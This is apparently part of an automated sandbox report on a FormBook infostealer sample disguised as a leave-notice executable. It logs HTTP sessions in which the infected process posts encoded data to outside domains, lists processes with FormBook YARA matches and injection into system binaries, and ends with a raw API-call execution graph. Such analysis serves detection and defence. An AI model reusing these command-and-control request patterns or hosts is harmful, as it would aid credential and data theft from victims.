4d 42 63 56 59 6b 54 49 52 7a [TRUNCATED]
                                                    Data Ascii: StWXF0Jx=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 [TRUNCATED]
                                                    Nov 21, 2024 16:18:54.456902027 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 21 Nov 2024 15:18:54 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    20 | 192.168.2.5 | 49996 | 209.74.77.108 | 80 | 6308 | C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Nov 21, 2024 16:18:55.777929068 CET | 528 | OUT | GET /i5gf/?StWXF0Jx=b5EB5wzy9Ffpgxi54+1Z/hpFI4wOrvBGEdwPVoWw9aB094XdY8Z4QvLyijfbNXTXb/o83TjYq8/0I5ZRzCl+Qa/gFZ4gxutURWfxeLyMh3oNbVjBJMQVGcVSIottQNNDqQ==&zfI=jXEDeV4Xp62 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US
                                                    Host: www.hobbihub.info
                                                    Connection: close
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Nov 21, 2024 16:18:57.058135986 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 21 Nov 2024 15:18:56 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    21 | 192.168.2.5 | 49997 | 38.47.232.194 | 80 | 6308 | C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Nov 21, 2024 16:19:03.172666073 CET | 774 | OUT | POST /6rpr/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.76kdd.top
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Origin: http://www.76kdd.top
                                                    Referer: http://www.76kdd.top/6rpr/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Ascii: StWXF0Jx=Z4gtal9D9muTyraJP3U+rYtx9YzCOI0+c9O/cFY2Xh3Sj3dIX0EL+Lcc8mkiaGDJTb1r2X3hZvdCf9pU95UMG/JRjgEWThDilRHz/M9MyNyAxqFQsLkQzWGZ+NQjh7QfEJmhA3T5nTu6EWoH8WjPKHDV0MrW+N/jIA4jEqcfE3pHB0uDxhAg3cvhFdN096Br9GE10Ew=


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    22 | 192.168.2.5 | 49998 | 38.47.232.194 | 80 | 6308 | C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Nov 21, 2024 16:19:05.832386971 CET | 794 | OUT | POST /6rpr/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.76kdd.top
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 229
                                                    Origin: http://www.76kdd.top
                                                    Referer: http://www.76kdd.top/6rpr/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Ascii: StWXF0Jx=Z4gtal9D9muTgaKJNUs+6otwjIzCEo0lc9S/cBBzXTDSjWtIW2sLzrcczGkrUmDSTb5V2WLhZvZCf8ZU9K8DX/JX2QEUXhDilRHz/PAjyN6A2a1QvuEf92GG2tQjl7QTEJmTAyzTnVi6ETsH/EbOAHDprcrE1+CbHBwEH4dgb0w7ECfprDIIk8DZVOFDsKgCnlUFqTnPKyS57nQrsWCcWlKU/8Kr


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    23 | 192.168.2.5 | 49999 | 38.47.232.194 | 80 | 6308 | C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Nov 21, 2024 16:19:08.506819963 CET | 1811 | OUT | POST /6rpr/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.76kdd.top
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Origin: http://www.76kdd.top
                                                    Referer: http://www.76kdd.top/6rpr/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    24 | 192.168.2.5 | 50000 | 38.47.232.194 | 80 | 6308 | C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Nov 21, 2024 16:19:11.166989088 CET | 524 | OUT | GET /6rpr/?StWXF0Jx=U6INZSFl9w/0w7eUclNH1uQloYv6GNk9LcyHZGh1ex/X83RYU2QqyJ4e030xcVzYUaotyR6kZc9FdKJmpo1DO/tZ9h4UUwPPiw7Wz8cuuN6k65sGyuw58EydjYd8v6xFYg==&zfI=jXEDeV4Xp62 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US
                                                    Host: www.76kdd.top
                                                    Connection: close
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Nov 21, 2024 16:19:12.686775923 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 21 Nov 2024 15:19:12 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 148
                                                    Connection: close
                                                    ETag: "66e02f2c-94"
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>



                                                    Target ID:0
                                                    Start time:10:15:03
                                                    Start date:21/11/2024
                                                    Path:C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe"
                                                    Imagebase:0xf80000
                                                    File size:1'207'808 bytes
                                                    MD5 hash:201AD7754669B4D766349530ADCCA029
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:10:15:04
                                                    Start date:21/11/2024
                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe"
                                                    Imagebase:0xcd0000
                                                    File size:46'504 bytes
                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2516266335.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2513025295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2517323526.0000000006800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:10:15:32
                                                    Start date:21/11/2024
                                                    Path:C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe"
                                                    Imagebase:0xd50000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4580892352.0000000005940000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:5
                                                    Start time:10:15:35
                                                    Start date:21/11/2024
                                                    Path:C:\Windows\SysWOW64\Utilman.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\Utilman.exe"
                                                    Imagebase:0x790000
                                                    File size:97'280 bytes
                                                    MD5 hash:4F59EE095E37A83CDCB74091C807AFA9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4579368467.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4580545569.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4580597058.0000000004710000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:moderate
                                                    Has exited:false

                                                    Target ID:7
                                                    Start time:10:15:50
                                                    Start date:21/11/2024
                                                    Path:C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe"
                                                    Imagebase:0xd50000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:8
                                                    Start time:10:16:03
                                                    Start date:21/11/2024
                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                    Imagebase:0x7ff79f9e0000
                                                    File size:676'768 bytes
                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true


                                                      Execution Graph

                                                      Execution Coverage:3.9%
                                                      Dynamic/Decrypted Code Coverage:0.4%
                                                      Signature Coverage:8.2%
                                                      Total number of Nodes:2000
                                                      Total number of Limit Nodes:60
94986->94684 94988 f8511f 94987->94988 94989 ff1be7 94987->94989 95000 f8b384 94988->95000 95009 fba58f 48 API calls _memcpy_s 94989->95009 94992 f8512b 94992->94695 94993 ff1bf1 94994 f86eed 48 API calls 94993->94994 94995 ff1bf9 Mailbox 94994->94995 94996->94681 94997->94985 94998->94985 94999->94979 95001 f8b392 95000->95001 95008 f8b3c5 _memcpy_s 95000->95008 95002 f8b3b8 95001->95002 95003 f8b3fd 95001->95003 95001->95008 95004 f8bb85 48 API calls 95002->95004 95005 f9f4ea 48 API calls 95003->95005 95004->95008 95006 f8b407 95005->95006 95007 f9f4ea 48 API calls 95006->95007 95007->95008 95008->94992 95009->94993 95010->94750 95011->94716 95012->94723 95014 f9479f 95013->95014 95015 f94637 95013->95015 95018 f8ce19 48 API calls 95014->95018 95016 ff6e05 95015->95016 95017 f94643 95015->95017 95019 fde822 335 API calls 95016->95019 95157 f94300 335 API calls _memcpy_s 95017->95157 95025 f946e4 Mailbox 95018->95025 95021 ff6e11 95019->95021 95022 f94739 Mailbox 95021->95022 95158 fccc5c 86 API calls 4 library calls 95021->95158 95022->94750 95024 f94659 95024->95021 95024->95022 95024->95025 95029 fd6ff0 335 API calls 95025->95029 95107 fc6524 95025->95107 95110 fcfa0c 95025->95110 95151 f84252 95025->95151 95029->95022 95030->94726 95031->94731 95961 f8bd30 95032->95961 95034 f93267 95035 f932f8 95034->95035 95036 ff907a 95034->95036 95096 f93628 95034->95096 96034 f9c36b 86 API calls 95035->96034 96040 fccc5c 86 API calls 4 library calls 95036->96040 95041 ff91fa 96045 fccc5c 86 API calls 4 library calls 95041->96045 95042 f93313 95092 f934eb _memcpy_s Mailbox 95042->95092 95042->95096 95097 ff94df 95042->95097 95966 f82b7a 95042->95966 95046 ff926d 96049 fccc5c 86 API calls 4 library calls 95046->96049 95047 ff93c5 95050 f8fe30 335 API calls 95047->95050 95048 ff909a 95048->95041 95051 f8d645 53 API calls 95048->95051 95052 ff9407 95050->95052 95053 ff910c 95051->95053 95052->95096 96054 f8d6e9 95052->96054 95057 ff9114 95053->95057 95058 ff9220 95053->95058 
95055 f933ce 95059 ff945e 95055->95059 95060 f93465 95055->95060 95055->95092 95070 ff9128 95057->95070 95076 ff9152 95057->95076 96046 f81caa 49 API calls 95058->96046 96059 fcc942 50 API calls 95059->96059 95066 f9f4ea 48 API calls 95060->95066 95083 f9346c 95066->95083 95067 ff9438 96058 fccc5c 86 API calls 4 library calls 95067->96058 95068 ff923d 95072 ff925e 95068->95072 95073 ff9252 95068->95073 95069 f8fe30 335 API calls 95069->95092 96041 fccc5c 86 API calls 4 library calls 95070->96041 95071 f9c3c3 48 API calls 95071->95092 96048 fccc5c 86 API calls 4 library calls 95072->96048 96047 fccc5c 86 API calls 4 library calls 95073->96047 95080 ff9177 95076->95080 95084 ff9195 95076->95084 95077 f9f4ea 48 API calls 95077->95092 96042 fdf320 335 API calls 95080->96042 95088 f9351f 95083->95088 95973 f8e8d0 95083->95973 95085 ff918b 95084->95085 96043 fdf5ee 335 API calls 95084->96043 95085->95096 96044 f9c2d6 48 API calls _memcpy_s 95085->96044 95090 f86eed 48 API calls 95088->95090 95091 f93540 95088->95091 95090->95091 95091->95096 95098 ff94b0 95091->95098 95100 f93585 95091->95100 95092->95046 95092->95047 95092->95048 95092->95067 95092->95069 95092->95071 95092->95077 95092->95088 95093 ff9394 95092->95093 95092->95096 96036 f8d9a0 53 API calls __cinit 95092->96036 96037 f8d8c0 53 API calls 95092->96037 96038 f9c2d6 48 API calls _memcpy_s 95092->96038 96050 fdcda2 82 API calls Mailbox 95092->96050 96051 fc80e3 53 API calls 95092->96051 96052 f8d764 55 API calls 95092->96052 96053 f8dcae 50 API calls Mailbox 95092->96053 95095 f9f4ea 48 API calls 95093->95095 95095->95047 95103 f93635 Mailbox 95096->95103 96039 fccc5c 86 API calls 4 library calls 95096->96039 95097->95096 96061 fccc5c 86 API calls 4 library calls 95097->96061 96060 f8dcae 50 API calls Mailbox 95098->96060 95100->95096 95100->95097 95101 f93615 95100->95101 96035 f8dcae 50 API calls Mailbox 95101->96035 95103->94750 95104->94742 95105->94744 95106->94748 95159 fc6ca9 GetFileAttributesW 
95107->95159 95111 fcfa1c __ftell_nolock 95110->95111 95112 fcfa44 95111->95112 95251 f8d286 48 API calls 95111->95251 95114 f8936c 81 API calls 95112->95114 95115 fcfa5e 95114->95115 95116 fcfb68 95115->95116 95117 fcfa80 95115->95117 95127 fcfb92 95115->95127 95163 f841a9 95116->95163 95119 f8936c 81 API calls 95117->95119 95124 fcfa8c _wcscpy _wcschr 95119->95124 95121 fcfb8e 95123 f8936c 81 API calls 95121->95123 95121->95127 95122 f841a9 136 API calls 95122->95121 95125 fcfbc7 95123->95125 95130 fcfab0 _wcscat _wcscpy 95124->95130 95134 fcfade _wcscat 95124->95134 95187 fa1dfc 95125->95187 95127->95022 95128 f8936c 81 API calls 95129 fcfafc _wcscpy 95128->95129 95252 fc72cb GetFileAttributesW 95129->95252 95133 f8936c 81 API calls 95130->95133 95131 fcfbeb _wcscat _wcscpy 95138 f8936c 81 API calls 95131->95138 95133->95134 95134->95128 95135 fcfb1c __NMSG_WRITE 95135->95127 95136 f8936c 81 API calls 95135->95136 95137 fcfb48 95136->95137 95253 fc60dd 77 API calls 4 library calls 95137->95253 95141 fcfc82 95138->95141 95140 fcfb5c 95140->95127 95190 fc690b 95141->95190 95143 fcfca2 95144 fc6524 3 API calls 95143->95144 95145 fcfcb1 95144->95145 95146 f8936c 81 API calls 95145->95146 95148 fcfce2 95145->95148 95147 fcfccb 95146->95147 95196 fcbfa4 95147->95196 95150 f84252 84 API calls 95148->95150 95150->95127 95152 f8425c 95151->95152 95153 f84263 95151->95153 95154 fa35e4 __fcloseall 83 API calls 95152->95154 95155 f84272 95153->95155 95156 f84283 FreeLibrary 95153->95156 95154->95153 95155->95022 95156->95155 95157->95024 95158->95022 95160 fc6529 95159->95160 95161 fc6cc4 FindFirstFileW 95159->95161 95160->95022 95161->95160 95162 fc6cd9 FindClose 95161->95162 95162->95160 95254 f84214 95163->95254 95168 ff4f73 95170 f84252 84 API calls 95168->95170 95169 f841d4 LoadLibraryExW 95264 f84291 95169->95264 95172 ff4f7a 95170->95172 95175 f84291 3 API calls 95172->95175 95177 ff4f82 95175->95177 95176 f841fb 95176->95177 95178 f84207 95176->95178 95290 f844ed 
95177->95290 95179 f84252 84 API calls 95178->95179 95181 f8420c 95179->95181 95181->95121 95181->95122 95184 ff4fa9 95298 f84950 95184->95298 95593 fa1e46 95187->95593 95191 fc6918 _wcschr __ftell_nolock 95190->95191 95192 fa1dfc __wsplitpath 47 API calls 95191->95192 95195 fc692e _wcscat _wcscpy 95191->95195 95193 fc695d 95192->95193 95194 fa1dfc __wsplitpath 47 API calls 95193->95194 95194->95195 95195->95143 95197 fcbfb1 __ftell_nolock 95196->95197 95198 f9f4ea 48 API calls 95197->95198 95199 fcc00e 95198->95199 95200 f847b7 48 API calls 95199->95200 95201 fcc018 95200->95201 95202 fcbdb4 GetSystemTimeAsFileTime 95201->95202 95203 fcc023 95202->95203 95204 f84517 83 API calls 95203->95204 95205 fcc036 _wcscmp 95204->95205 95206 fcc05a 95205->95206 95207 fcc107 95205->95207 95649 fcc56d 95206->95649 95209 fcc56d 94 API calls 95207->95209 95224 fcc0d3 _wcscat 95209->95224 95211 fa1dfc __wsplitpath 47 API calls 95216 fcc088 _wcscat _wcscpy 95211->95216 95212 f844ed 64 API calls 95214 fcc12c 95212->95214 95213 fcc110 95213->95148 95215 f844ed 64 API calls 95214->95215 95217 fcc13c 95215->95217 95219 fa1dfc __wsplitpath 47 API calls 95216->95219 95218 f844ed 64 API calls 95217->95218 95220 fcc157 95218->95220 95219->95224 95221 f844ed 64 API calls 95220->95221 95222 fcc167 95221->95222 95223 f844ed 64 API calls 95222->95223 95225 fcc182 95223->95225 95224->95212 95224->95213 95226 f844ed 64 API calls 95225->95226 95227 fcc192 95226->95227 95228 f844ed 64 API calls 95227->95228 95229 fcc1a2 95228->95229 95230 f844ed 64 API calls 95229->95230 95231 fcc1b2 95230->95231 95619 fcc71a GetTempPathW GetTempFileNameW 95231->95619 95233 fcc1be 95234 fa3499 117 API calls 95233->95234 95245 fcc1cf 95234->95245 95235 fcc289 95633 fa35e4 95235->95633 95237 fcc294 95239 fcc2ae 95237->95239 95240 fcc29a DeleteFileW 95237->95240 95238 f844ed 64 API calls 95238->95245 95241 fcc342 CopyFileW 95239->95241 95246 fcc2b8 95239->95246 95240->95213 95242 fcc358 DeleteFileW 95241->95242 
95243 fcc36a DeleteFileW 95241->95243 95242->95213 95646 fcc6d9 CreateFileW 95243->95646 95245->95213 95245->95235 95245->95238 95620 fa2aae 95245->95620 95655 fcb965 95246->95655 95250 fcc331 DeleteFileW 95250->95213 95251->95112 95252->95135 95253->95140 95303 f84339 95254->95303 95256 f8423c 95259 f841bb 95256->95259 95260 f84244 FreeLibrary 95256->95260 95261 fa3499 95259->95261 95260->95259 95311 fa34ae 95261->95311 95263 f841c8 95263->95168 95263->95169 95507 f842e4 95264->95507 95267 f842b8 95269 f841ec 95267->95269 95270 f842c1 FreeLibrary 95267->95270 95271 f84380 95269->95271 95270->95269 95272 f9f4ea 48 API calls 95271->95272 95273 f84395 95272->95273 95274 f847b7 48 API calls 95273->95274 95275 f843a1 _memcpy_s 95274->95275 95276 f843dc 95275->95276 95277 f84499 95275->95277 95278 f844d1 95275->95278 95279 f84950 57 API calls 95276->95279 95515 f8406b CreateStreamOnHGlobal 95277->95515 95526 fcc750 93 API calls 95278->95526 95289 f843e5 95279->95289 95282 f844ed 64 API calls 95282->95289 95283 f84479 95283->95176 95285 ff4ed7 95286 f84517 83 API calls 95285->95286 95287 ff4eeb 95286->95287 95288 f844ed 64 API calls 95287->95288 95288->95283 95289->95282 95289->95283 95289->95285 95521 f84517 95289->95521 95291 f844ff 95290->95291 95292 ff4fc0 95290->95292 95550 fa381e 95291->95550 95295 fcbf5a 95570 fcbdb4 95295->95570 95297 fcbf70 95297->95184 95299 f8495f 95298->95299 95301 ff5002 95298->95301 95575 fa3e65 95299->95575 95302 f84967 95307 f8434b 95303->95307 95306 f84321 LoadLibraryA GetProcAddress 95306->95256 95308 f8422f 95307->95308 95309 f84354 LoadLibraryA 95307->95309 95308->95256 95308->95306 95309->95308 95310 f84365 GetProcAddress 95309->95310 95310->95308 95314 fa34ba __fcloseall 95311->95314 95312 fa34cd 95359 fa7c0e 47 API calls __getptd_noexit 95312->95359 95314->95312 95316 fa34fe 95314->95316 95315 fa34d2 95360 fa6e10 8 API calls strtoxl 95315->95360 95330 fae4c8 95316->95330 95319 fa3503 95320 fa3519 95319->95320 95321 fa350c 
95319->95321 95323 fa3543 95320->95323 95324 fa3523 95320->95324 95361 fa7c0e 47 API calls __getptd_noexit 95321->95361 95344 fae5e0 95323->95344 95362 fa7c0e 47 API calls __getptd_noexit 95324->95362 95327 fa34dd __fcloseall @_EH4_CallFilterFunc@8 95327->95263 95331 fae4d4 __fcloseall 95330->95331 95364 fa7cf4 95331->95364 95333 fae552 95371 fae5d7 95333->95371 95334 fae559 95400 fa69d0 47 API calls __malloc_crt 95334->95400 95337 fae560 95337->95333 95339 fae56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 95337->95339 95338 fae5cc __fcloseall 95338->95319 95339->95333 95342 fae4e2 95342->95333 95342->95334 95374 fa7d7c 95342->95374 95398 fa4e5b 48 API calls __lock 95342->95398 95399 fa4ec5 LeaveCriticalSection LeaveCriticalSection _doexit 95342->95399 95353 fae600 __wopenfile 95344->95353 95345 fae61a 95412 fa7c0e 47 API calls __getptd_noexit 95345->95412 95346 fae7d5 95346->95345 95350 fae838 95346->95350 95348 fae61f 95413 fa6e10 8 API calls strtoxl 95348->95413 95409 fb63c9 95350->95409 95351 fa354e 95363 fa3570 LeaveCriticalSection LeaveCriticalSection _fprintf 95351->95363 95353->95345 95353->95346 95353->95353 95414 fa185b 59 API calls 2 library calls 95353->95414 95355 fae7ce 95355->95346 95415 fa185b 59 API calls 2 library calls 95355->95415 95357 fae7ed 95357->95346 95416 fa185b 59 API calls 2 library calls 95357->95416 95359->95315 95360->95327 95361->95327 95362->95327 95363->95327 95365 fa7d18 EnterCriticalSection 95364->95365 95366 fa7d05 95364->95366 95365->95342 95367 fa7d7c __mtinitlocknum 46 API calls 95366->95367 95368 fa7d0b 95367->95368 95368->95365 95401 fa115b 47 API calls 3 library calls 95368->95401 95402 fa7e58 LeaveCriticalSection 95371->95402 95373 fae5de 95373->95338 95375 fa7d88 __fcloseall 95374->95375 95376 fa7da9 95375->95376 95377 fa7d91 95375->95377 95379 fa7da7 95376->95379 95385 fa7e11 __fcloseall 95376->95385 95403 fa81c2 47 API calls 2 library calls 95377->95403 95379->95376 95406 fa69d0 47 API calls 
